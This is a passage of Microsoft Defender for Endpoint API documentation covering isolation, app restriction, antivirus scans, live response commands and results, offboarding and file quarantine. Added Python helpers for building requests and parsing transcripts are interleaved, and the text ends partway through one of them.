Version 1909 or later
Version 1903 with KB4515384
Version 1809 (RS 5) with KB4537818
Version 1803 (RS 4) with KB4537795
Version 1709 (RS 3) with KB4537816

Windows Server 2019 - Only applicable for Public preview
Version 1903 or later (with KB4515384)
Version 1809 (with KB4537818)

Windows Server 2022

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Get started.

Permission type                     Permission             Permission display name
Application                         Machine.Read.All       Read all machine profiles
Application                         Machine.ReadWrite.All  Read and write all machine information
Delegated (work or school account)  Machine.LiveResponse   Run live response on a specific machine

HTTP request
HTTP

GET https://api.securitycenter.microsoft.com/api/machineactions/{machine action id}/GetLiveResponseResultDownloadLink(index={command-index})

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK response code with an object that holds the link to the command result in the value property. This link is valid for 30 minutes and should be used immediately to download the result to local storage. An expired link can be re-created by another call, so there's no need to run live response again.

Runscript transcript properties:

Property       Description
script_name    Executed script name
exit_code      Executed script exit code
script_output  Executed script standard output
script_errors  Executed script standard error output

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machineactions/988cc94e-7a8f-4b28-ab65-54970c5d5018/GetLiveResponseResultDownloadLink(index=0)

Response example
Here's an example of the response.

JSON

HTTP/1.1 200 Ok
Content-type: application/json

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Edm.String",
    "value": "https://core.windows.net/investigation-actions-data/ID/CustomPlaybookCommandOutput/4ed5e7807ad1fe59b00b664fe06a0f07?se=2021-02-04T16%3A13%3A50Z&sp=r&sv=2019-07-07&sr=b&sig=1dYGe9rPvUlXBPvYSmr6/OLXPY98m8qWqfIQCBbyZTY%3D"
}

File content:

JSON

{
    "script_name": "minidump.ps1",
    "exit_code": 0,
    "script_output": "Transcript started, output file is C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Temp\\PSScriptOutputs\\PSScript_Transcript_{TRANSCRIPT_ID}.txt C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip\n51 MB\n\u0000\u0000\u0000",
    "script_errors": ""
}
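The downloaded transcript carries the four properties from the table above, with the PowerShell transcript header and NUL padding mixed into script_output. The Python below is an added example, not Microsoft's code: it parses a RunScript transcript, strips the padding and header line, rejects a download that lacks a documented property, and flags a run as not ok when the exit code is non-zero or standard error has text. Both transcripts are constructed samples shaped like the page's file content.

```python
import json

# Constructed transcript file, shaped like the download on this page
# (illustrative values; the {TRANSCRIPT_ID} placeholder is the page's own).
SAMPLE_TRANSCRIPT = json.dumps({
    "script_name": "minidump.ps1",
    "exit_code": 0,
    "script_output": ("Transcript started, output file is C:\\ProgramData\\Microsoft\\Windows Defender "
                      "Advanced Threat Protection\\Temp\\PSScriptOutputs\\PSScript_Transcript_{TRANSCRIPT_ID}.txt\r\n"
                      "C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip\n51 MB\n\u0000\u0000\u0000"),
    "script_errors": "",
})

# Constructed failing run: non-zero exit code and text on standard error.
SAMPLE_FAILED_TRANSCRIPT = json.dumps({
    "script_name": "minidump.ps1",
    "exit_code": 1,
    "script_output": "Transcript started, output file is C:\\placeholder\\PSScript_Transcript_{TRANSCRIPT_ID}.txt\n\u0000",
    "script_errors": "Get-Process : Access is denied\u0000",
})

REQUIRED_PROPERTIES = ("script_name", "exit_code", "script_output", "script_errors")
TRANSCRIPT_HEADER = "Transcript started, output file is "


def parse_runscript_transcript(text):
    """Parse a RunScript transcript fetched through GetLiveResponseResultDownloadLink.

    Returns the four documented properties plus:
      output_lines - stdout split into lines, with NUL padding, blank lines and
                     the PowerShell transcript header line removed
      ok           - True when exit_code is 0 and script_errors is empty
    Raises ValueError if a documented property is missing, so a truncated or
    unrelated download is not mistaken for a clean result.
    """
    data = json.loads(text)
    missing = [key for key in REQUIRED_PROPERTIES if key not in data]
    if missing:
        raise ValueError(f"transcript is missing properties: {missing}")
    stdout = data["script_output"].replace("\u0000", "")
    lines = [line.rstrip("\r") for line in stdout.split("\n")]
    lines = [line for line in lines if line and not line.startswith(TRANSCRIPT_HEADER)]
    errors = data["script_errors"].replace("\u0000", "").strip()
    exit_code = int(data["exit_code"])
    return {
        "script_name": data["script_name"],
        "exit_code": exit_code,
        "output_lines": lines,
        "script_errors": errors,
        "ok": exit_code == 0 and not errors,
    }
```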

Related articles
Get machine action API
Cancel machine action
Run live response


Isolate machine API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Isolates a device from accessing external network.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Note

This page focuses on performing a machine action via API. See take response actions on a machine for more information about response actions functionality via Microsoft Defender for Endpoint.

Important

Full isolation is available for devices on Windows 10, version 1703, and on Windows 11.
Full isolation is available in public preview for all supported Microsoft Defender for Endpoint on Linux listed in System requirements.
Selective isolation is available for devices on Windows 10, version 1709 or later, and on Windows 11.
When isolating a device, only certain processes and destinations are allowed. Therefore, devices that are behind a full VPN tunnel won't be able to reach the Microsoft Defender for Endpoint cloud service after the device is isolated. We recommend using a split-tunneling VPN for Microsoft Defender for Endpoint and Microsoft Defender Antivirus cloud-based protection-related traffic.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type                     Permission       Permission display name
Application                         Machine.Isolate  'Isolate machine'
Delegated (work or school account)  Machine.Isolate  'Isolate machine'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'Active remediation actions' (see Create and manage roles for more information).
The user needs to have access to the device, based on device group settings (see Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machines/{id}/isolate

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter      Type    Description
Comment        String  Comment to associate with the action. Required.
IsolationType  String  Type of the isolation. Allowed values are: 'Full' or 'Selective'.

IsolationType controls the type of isolation to perform and can be one of the following:

Full: Full isolation
Selective: Restrict only a limited set of applications from accessing the network (see Isolate devices from the network for more details)

Response
If successful, this method returns 201 - Created response code and Machine Action in
the response body.

Example

Request
Here is an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/isolate

JSON

{
"Comment": "Isolate machine due to alert 1234",
"IsolationType": "Full"
}

To release a device from isolation, see Release device from isolation.



Release device from isolation API
Article • 09/27/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

- api-us.securitycenter.microsoft.com
- api-eu.securitycenter.microsoft.com
- api-uk.securitycenter.microsoft.com
- api-au.securitycenter.microsoft.com

API description
Undo isolation of a device.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Note

This page focuses on performing a machine action via API. See take response
actions on a machine for more information about response actions functionality
via Microsoft Defender for Endpoint.

Important

- Full isolation is available for devices on Windows 10, version 1703.
- Full isolation is available in public preview for all supported versions of Microsoft
  Defender for Endpoint on Linux listed in System requirements.
- Selective isolation is available for devices on Windows 10, version 1709 or
  later.
- When isolating a device, only certain processes and destinations are allowed.
  Therefore, devices that are behind a full VPN tunnel won't be able to reach
  the Microsoft Defender for Endpoint cloud service after the device is isolated.
  We recommend using a split-tunneling VPN for Microsoft Defender for
  Endpoint and Microsoft Defender Antivirus cloud-based protection-related
  traffic.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type                     Permission       Permission display name
Application                         Machine.Isolate  'Isolate machine'
Delegated (work or school account)  Machine.Isolate  'Isolate machine'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'Active
  remediation actions' (see Create and manage roles for more information).
- The user needs to have access to the device, based on device group settings
  (see Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machines/{id}/unisolate

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter  Type    Description
Comment    String  Comment to associate with the action. Required.

Response
If successful, this method returns a 201 Created response code and a Machine Action in
the response body.

If you send multiple API calls to remove isolation for the same device, the API returns a
"pending machine action" or HTTP 400 with the message "Action is already in progress".

Example

Request
Here is an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/unisolate

JSON

{
  "Comment": "Unisolate machine since it was clean and validated"
}

To isolate a device, see Isolate device.


Restrict app execution API
Article • 11/15/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

- api-us.securitycenter.microsoft.com
- api-eu.securitycenter.microsoft.com
- api-uk.securitycenter.microsoft.com
- api-au.securitycenter.microsoft.com

API description
Restrict execution of all applications on the device except a predefined set.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Note

This page focuses on performing a machine action via API. See take response
actions on a machine for more information about response actions functionality
via Microsoft Defender for Endpoint.

Important

- This action is available for devices on Windows 10, version 1709 or later, and
  on Windows 11.
- This feature is available if your organization uses Microsoft Defender Antivirus.
- This action needs to meet the Windows Defender Application Control code
  integrity policy formats and signing requirements. For more information, see
  Code integrity policy formats and signing.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type                     Permission                 Permission display name
Application                         Machine.RestrictExecution  'Restrict code execution'
Delegated (work or school account)  Machine.RestrictExecution  'Restrict code execution'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'Active
  remediation actions' (see Create and manage roles for more information).
- The user needs to have access to the device, based on device group settings
  (see Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machines/{id}/restrictCodeExecution

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter  Type    Description
Comment    String  Comment to associate with the action. Required.

Response
If successful, this method returns a 201 Created response code and a Machine Action in
the response body.

If you send multiple API calls to restrict app execution for the same device, the API returns
a "pending machine action" or HTTP 400 with the message "Action is already in progress".

Example

Request
Here is an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/restrictCodeExecution

JSON

{
  "Comment": "Restrict code execution due to alert 1234"
}

To remove code execution restriction from a device, see Remove app restriction.


Remove app restriction API
Article • 09/27/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

- api-us.securitycenter.microsoft.com
- api-eu.securitycenter.microsoft.com
- api-uk.securitycenter.microsoft.com
- api-au.securitycenter.microsoft.com

API description
Enable execution of any application on the device.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Note

This page focuses on performing a machine action via API. See take response
actions on a machine for more information about response actions functionality
via Microsoft Defender for Endpoint.

Important

- Full isolation is available for devices on Windows 10, version 1703.
- Selective isolation is available for devices on Windows 10, version 1709 or
  later.
- When isolating a device, only certain processes and destinations are allowed.
  Therefore, devices that are behind a full VPN tunnel won't be able to reach
  the Microsoft Defender for Endpoint cloud service after the device is isolated.
  We recommend using a split-tunneling VPN for Microsoft Defender for
  Endpoint and Microsoft Defender Antivirus cloud-based protection-related
  traffic.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type                     Permission                 Permission display name
Application                         Machine.RestrictExecution  'Restrict code execution'
Delegated (work or school account)  Machine.RestrictExecution  'Restrict code execution'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'Active
  remediation actions' (see Create and manage roles for more information).
- The user needs to have access to the device, based on device group settings
  (see Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machines/{id}/unrestrictCodeExecution

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter  Type    Description
Comment    String  Comment to associate with the action. Required.

Response
If successful, this method returns a 201 Created response code and a Machine Action in
the response body.

If you send multiple API calls to remove app restrictions for the same device, the API returns
a "pending machine action" or HTTP 400 with the message "Action is already in progress".

Example

Request
Here is an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/unrestrictCodeExecution

JSON

{
  "Comment": "Unrestrict code execution since machine was cleaned and validated"
}

To restrict code execution on a device, see Restrict app execution.


Run antivirus scan API
Article • 09/27/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

- api-us.securitycenter.microsoft.com
- api-eu.securitycenter.microsoft.com
- api-uk.securitycenter.microsoft.com
- api-au.securitycenter.microsoft.com

API description
Initiate Microsoft Defender Antivirus scan on a device.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Note

This page focuses on performing a machine action via API. See take response
actions on a machine for more information about response actions functionality
via Microsoft Defender for Endpoint.

Important

- This action is available for devices on Windows 10, version 1709 or later, and
  on Windows 11.
- A Microsoft Defender Antivirus scan can run alongside other antivirus
  solutions, whether Microsoft Defender Antivirus is the active antivirus solution
  or not. Microsoft Defender Antivirus can be in Passive mode. For more
  information, see Microsoft Defender Antivirus compatibility.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type                     Permission    Permission display name
Application                         Machine.Scan  'Scan machine'
Delegated (work or school account)  Machine.Scan  'Scan machine'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'Active
  remediation actions' (see Create and manage roles for more information).
- The user needs to have access to the device, based on device group settings
  (see Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machines/{id}/runAntiVirusScan

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json

Request body
In the request body, supply a JSON object with the following parameters:

Parameter  Type    Description
Comment    String  Comment to associate with the action. Required.
ScanType   String  Defines the type of the Scan. Required.

ScanType controls the type of scan to perform and can be one of the following:

- Quick: Perform a quick scan on the device
- Full: Perform a full scan on the device

Response
If successful, this method returns a 201 Created response code and a MachineAction object
in the response body.

If you send multiple API calls to run an antivirus scan for the same device, the API returns
a "pending machine action" or HTTP 400 with the message "Action is already in progress".

Example

Request
Here is an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/runAntiVirusScan

JSON

{
  "Comment": "Check machine for viruses due to alert 3212",
  "ScanType": "Full"
}


Run live response commands on a device
Article • 11/22/2023

Applies to:

- Microsoft Defender for Endpoint Plan 2

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

- api-us.securitycenter.microsoft.com
- api-eu.securitycenter.microsoft.com
- api-uk.securitycenter.microsoft.com
- api-au.securitycenter.microsoft.com

API description
Runs a sequence of live response commands on a device.

Limitations
1. Rate limitations for this API are 10 calls per minute (additional requests are
   responded to with HTTP 429).

2. 25 concurrently running sessions (requests exceeding the throttling limit receive a
   "429 - Too many requests" response).

3. If the machine isn't available, the session is queued for up to three days.

4. The RunScript command times out after 10 minutes.

5. Live response commands can't be queued up and can only be executed one at a
   time.

6. If the machine that you're trying to run this API call on is in an RBAC device group that
   doesn't have an automated remediation level assigned to it, you need to at least
   enable the minimum Remediation Level for the given Device Group.

   Note

   Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

7. Multiple live response commands can be run in a single API call. However, when a
   live response command fails, all the subsequent actions won't be executed.

8. Multiple live response sessions can't be executed on the same machine (if a live
   response action is already running, subsequent requests are responded to with
   HTTP 400 - ActiveRequestAlreadyExists).

Note

Live response actions initiated from the Device page are not available in the
machineactions API.

Minimum Requirements
Before you can initiate a session on a device, make sure you fulfill the following
requirements:

Verify that you're running a supported Windows, macOS, or Linux version.

Devices must be running one of the following:

- Windows 11
- Windows 10
  - Version 1909 or later
  - Version 1903 with KB4515384
  - Version 1809 (RS 5) with KB4537818
  - Version 1803 (RS 4) with KB4537795
  - Version 1709 (RS 3) with KB4537816
- Windows Server 2019 - Only applicable for Public preview
  - Version 1903 (with KB4515384) or later
  - Version 1809 (with KB4537818)
- Windows Server 2022
- macOS (requires additional configuration profiles)
  - 13 (Ventura)
  - 12 (Monterey)
  - 11 (Big Sur)
- Linux
  - Supported Linux server distributions and kernel versions

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Get started.

Permission type                     Permission            Permission display name
Application                         Machine.LiveResponse  Run live response on a specific machine
Delegated (work or school account)  Machine.LiveResponse  Run live response on a specific machine

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/API/machines/{machine_id}/runliveresponse

Request headers

Name           Type    Description
Authorization  String  Bearer <token>. Required.
Content-Type   String  application/json. Required.

Request body

Parameter  Type    Description
Comment    String  Comment to associate with the action.
Commands   Array   Commands to run. Allowed values are PutFile, RunScript, GetFile (must be
                   in this order with no limit on repetitions).

Commands

Command type  Parameters                    Description
PutFile       Key: FileName                 Puts a file from the library to the device. Files are saved in a
              Value: <file name>            working folder and are deleted when the device restarts by
                                            default. NOTE: Doesn't have a response result.
RunScript     Key: ScriptName               Runs a script from the library on a device.
              Value: <script from library>  The Args parameter is passed to your script.
              Key: Args                     Times out after 10 minutes.
              Value: <script arguments>
GetFile       Key: Path                     Collect a file from a device. NOTE: Backslashes in the path
              Value: <file path>            must be escaped.

Response
If successful, this method returns 201 Created with a Machine Action entity. If a machine
with the specified ID wasn't found, it returns 404 Not Found.

Example

Request example
Here's an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/runliveresponse

JSON

{
  "Commands": [
    {
      "type": "RunScript",
      "params": [
        { "key": "ScriptName", "value": "minidump.ps1" },
        { "key": "Args", "value": "OfficeClickToRun" }
      ]
    },
    {
      "type": "GetFile",
      "params": [
        { "key": "Path", "value": "C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip" }
      ]
    }
  ],
  "Comment": "Testing Live Response API"
}

Response example
Here's an example of the response.

Possible values for each command status are "Created", "Completed", and "Failed".

HTTP

HTTP/1.1 200 Ok

Content-type: application/json

JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineActions/$entity",
  "id": "{machine_action_id}",
  "type": "LiveResponse",
  "requestor": "analyst@microsoft.com",
  "requestorComment": "Testing Live Response API",
  "status": "Pending",
  "machineId": "{machine_id}",
  "computerDnsName": "hostname",
  "creationDateTimeUtc": "2021-02-04T15:36:52.7788848Z",
  "lastUpdateDateTimeUtc": "2021-02-04T15:36:52.7788848Z",
  "errorHResult": 0,
  "commands": [
    {
      "index": 0,
      "startTime": null,
      "endTime": null,
      "commandStatus": "Created",
      "errors": [],
      "command": {
        "type": "RunScript",
        "params": [
          { "key": "ScriptName", "value": "minidump.ps1" },
          { "key": "Args", "value": "OfficeClickToRun" }
        ]
      }
    },
    {
      "index": 1,
      "startTime": null,
      "endTime": null,
      "commandStatus": "Created",
      "errors": [],
      "command": {
        "type": "GetFile",
        "params": [
          { "key": "Path", "value": "C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip" }
        ]
      }
    }
  ]
}
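
The request and response above can be handled programmatically. The following is an added example (not Microsoft's code or part of this article) that builds a live response Commands array while enforcing the documented PutFile, RunScript, GetFile ordering, lets json.dumps escape backslashes in GetFile paths, and reads the MachineAction entity back to report per-command status; the sample response it parses is constructed from the one shown above, with the GetFile command marked Failed.

```python
"""Compose a live response command sequence and summarise the API's result.

Added example, not Microsoft's code. The ordering rule, the three command
types and the Created/Completed/Failed statuses come from the article;
SAMPLE_RESPONSE is a constructed MachineAction entity modelled on the page's
response example.
"""
import json

# Allowed command types and the stage each belongs to. The Commands array
# must be ordered PutFile -> RunScript -> GetFile, with any number of each.
COMMAND_ORDER = {"PutFile": 0, "RunScript": 1, "GetFile": 2}


def put_file(file_name):
    return {"type": "PutFile", "params": [{"key": "FileName", "value": file_name}]}


def run_script(script_name, args=None):
    params = [{"key": "ScriptName", "value": script_name}]
    if args is not None:
        params.append({"key": "Args", "value": args})
    return {"type": "RunScript", "params": params}


def get_file(path):
    # json.dumps escapes every backslash, so "C:\windows" is sent as "C:\\windows",
    # which is the escaping the GetFile command requires.
    return {"type": "GetFile", "params": [{"key": "Path", "value": path}]}


def build_live_response_body(commands, comment):
    """Return the JSON request body, or raise ValueError when a command type is
    unsupported or the sequence goes backwards (e.g. GetFile before RunScript)."""
    if not commands:
        raise ValueError("at least one command is required")
    last_stage = -1
    for index, cmd in enumerate(commands):
        stage = COMMAND_ORDER.get(cmd.get("type"))
        if stage is None:
            raise ValueError(f"command {index}: unsupported type {cmd.get('type')!r}")
        if stage < last_stage:
            raise ValueError(f"command {index}: {cmd['type']} may not follow a later-stage "
                             "command; the order is PutFile, RunScript, GetFile")
        last_stage = stage
    return json.dumps({"Commands": commands, "Comment": comment})


def sequence_error(commands):
    """Return the validation message for a command list, or None when it is valid."""
    try:
        build_live_response_body(commands, "validation only")
    except ValueError as exc:
        return str(exc)
    return None


def summarise(machine_action):
    """Reduce a LiveResponse MachineAction entity to the action status, one
    (index, type, commandStatus) row per command, and the index of the first
    Failed command. After a failure the remaining commands are not executed,
    so they stay in the Created state."""
    rows, halted_at = [], None
    for entry in machine_action.get("commands", []):
        status = entry.get("commandStatus")
        rows.append((entry["index"], entry["command"]["type"], status))
        if status == "Failed" and halted_at is None:
            halted_at = entry["index"]
    return {"status": machine_action.get("status"), "commands": rows, "halted_at": halted_at}


# Constructed sample entity (ids, hostname and the failure are made up).
SAMPLE_RESPONSE = {
    "id": "{machine_action_id}",
    "type": "LiveResponse",
    "status": "Failed",
    "commands": [
        {"index": 0, "commandStatus": "Completed", "errors": [],
         "command": run_script("minidump.ps1", "OfficeClickToRun")},
        {"index": 1, "commandStatus": "Failed", "errors": ["constructed error text"],
         "command": get_file("C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip")},
    ],
}

if __name__ == "__main__":
    print(build_live_response_body(
        [run_script("minidump.ps1", "OfficeClickToRun"),
         get_file("C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip")],
        "Testing Live Response API"))
    print(summarise(SAMPLE_RESPONSE))
```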

Related topics
Get machine action API
Get live response result
Cancel machine action


Offboard machine API
Article • 12/13/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

- api-us.securitycenter.microsoft.com
- api-eu.securitycenter.microsoft.com
- api-uk.securitycenter.microsoft.com
- api-au.securitycenter.microsoft.com

API description
Offboard device from Defender for Endpoint.

Limitations
Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Note

This page focuses on performing a machine action via API. See take response
actions on a machine for more information about response actions
functionality via Microsoft Defender for Endpoint.

Note

- This API is supported on Windows 11, Windows 10, version 1703 and later; on
  Windows Server 2019 and later; and on Windows Server 2012 R2 and
  Windows Server 2016 when using the new, unified agent for Defender for
  Endpoint.
- This API is not supported on macOS or Linux devices.
- Running the offboarding API only stops the sensor service from running, but it
  does not remove the onboarding information from the registry like an
  offboarding script does.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Defender for Endpoint APIs.

Permission type                     Permission        Permission display name
Application                         Machine.Offboard  'Offboard machine'
Delegated (work or school account)  Machine.Offboard  'Offboard machine'

Note

When obtaining a token using user credentials:

- The user needs to have the 'Global Admin' AD role.
- The user needs to have access to the device, based on device group settings
  (see Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machines/{id}/offboard

The machine ID can be found in the URL when you select the device. Generally, it's a
40-character alphanumeric identifier.

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter  Type    Description
Comment    String  Comment to associate with the action. Required.

Response
If successful, this method returns a 200 - Created response code and a Machine Action in
the response body.

Example

Request
Here's an example of the request. If there's no JSON comment added, it will error out
with code 400.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/offboard

JSON

{
  "Comment": "Offboard machine by automation"
}


Stop and quarantine file API
Article • 09/27/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

- api-us.securitycenter.microsoft.com
- api-eu.securitycenter.microsoft.com
- api-uk.securitycenter.microsoft.com
- api-au.securitycenter.microsoft.com

API description
Stop execution of a file on a device and delete it.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Note

This page focuses on performing a machine action via API. See take response
actions on a machine for more information about response actions functionality
via Microsoft Defender for Endpoint.

Important

You can only take this action if:

- The device you're taking the action on is running Windows 10, version 1703 or
  later, or Windows 11
- The file does not belong to trusted third-party publishers or is not signed by
  Microsoft
- Microsoft Defender Antivirus must at least be running on Passive mode. For
  more information, see Microsoft Defender Antivirus compatibility.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type                     Permission                 Permission display name
Application                         Machine.StopAndQuarantine  'Stop And Quarantine'
Application                         Machine.Read.All           'Read all machine profiles'
Application                         Machine.ReadWrite.All      'Read and write all machine information'
Delegated (work or school account)  Machine.StopAndQuarantine  'Stop And Quarantine'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'Active
  remediation actions' (see Create and manage roles for more information).
- The user needs to have access to the device, based on device group settings
  (see Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machines/{id}/StopAndQuarantineFile

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter  Type    Description
Comment    String  Comment to associate with the action. Required.
Sha1       String  Sha1 of the file to stop and quarantine on the device. Required.

Response
If successful, this method returns a 201 Created response code and a Machine Action in
the response body.

Example

Request
Here is an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/StopAndQuarantineFile

JSON

{
  "Comment": "Stop and quarantine file on machine due to alert 441688558380765161_2136280442",
  "Sha1": "87662bc3d60e4200ceaf7aae249d1c343f4b83c9"
}
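
The machine actions documented in the preceding articles (isolate, release from isolation, restrict and unrestrict app execution, run antivirus scan, offboard, and stop and quarantine file) all share one request shape: a POST to /api/machines/{id}/<action> with a bearer token and a JSON body that always carries Comment plus, for some actions, one extra parameter with a fixed set of allowed values. The following is an added example (not Microsoft's code) that builds and validates those requests before anything is sent and interprets the reply, including the HTTP 400 "Action is already in progress" case the articles describe; nothing here performs network I/O, and the short action names (isolate, scan, quarantine, ...) and the shape of the 400 error body are this example's assumptions.

```python
"""Build, validate and interpret Defender for Endpoint machine-action calls.

Added example, not Microsoft's code. URL segments, parameters, allowed values
and permissions are taken from the API articles above; the short action keys
and the dataclass are this example's own.
"""
import json
import re
from dataclasses import dataclass

# Regional front ends from the Tip sections; "" selects the global endpoint.
REGIONAL_HOSTS = {
    "": "api.securitycenter.microsoft.com",
    "us": "api-us.securitycenter.microsoft.com",
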